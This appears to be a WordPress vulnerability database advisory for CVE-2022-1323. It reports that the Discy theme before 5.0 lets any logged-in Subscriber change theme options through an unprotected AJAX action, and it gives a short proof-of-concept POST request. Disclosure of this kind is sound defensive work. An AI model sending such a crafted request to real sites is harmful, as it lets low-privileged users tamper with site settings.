Discy < 5.0 – Subscriber+ Broken Access Control to change settings | CVE 2022-1323 | Theme Vulnerabilities

Description

The theme lacks authorization checks then processing ajax requests to the discy_update_options action, allowing any logged in users (with privileges as low as Subscriber,) to change the theme options by sending a crafted POST request.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: [subscriber+]

action=discy_update_options&data=<changed settings>

Affects Themes

Fixed in 5.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

2d8020e1-6489-4555-9956-2dc190aaa61b

Timeline

Publicly Published

2022-07-12 (about 3 years ago)

Added

2022-07-12 (about 3 years ago)

Last Updated

2023-07-04 (about 2 years ago)

Other

Published

Title

Published

2025-09-22

Title

Image Hover Effects – Elementor Addon <= 1.4.4 - Missing Authorization

Published

2025-11-12

Title

Survey Maker < 5.1.9.5 - Missing Authorization to Unauthenticated Information Exposure

Published

2024-06-21

Title

Hercules Core < 6.7 - Missing Authorization to Settings Update

Published

2024-04-05

Title

All-in-One Video Gallery < 3.6.0 - Missing Authorization

Published

2025-01-16

Title

Minterpress <= 1.0.5 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Content Deletion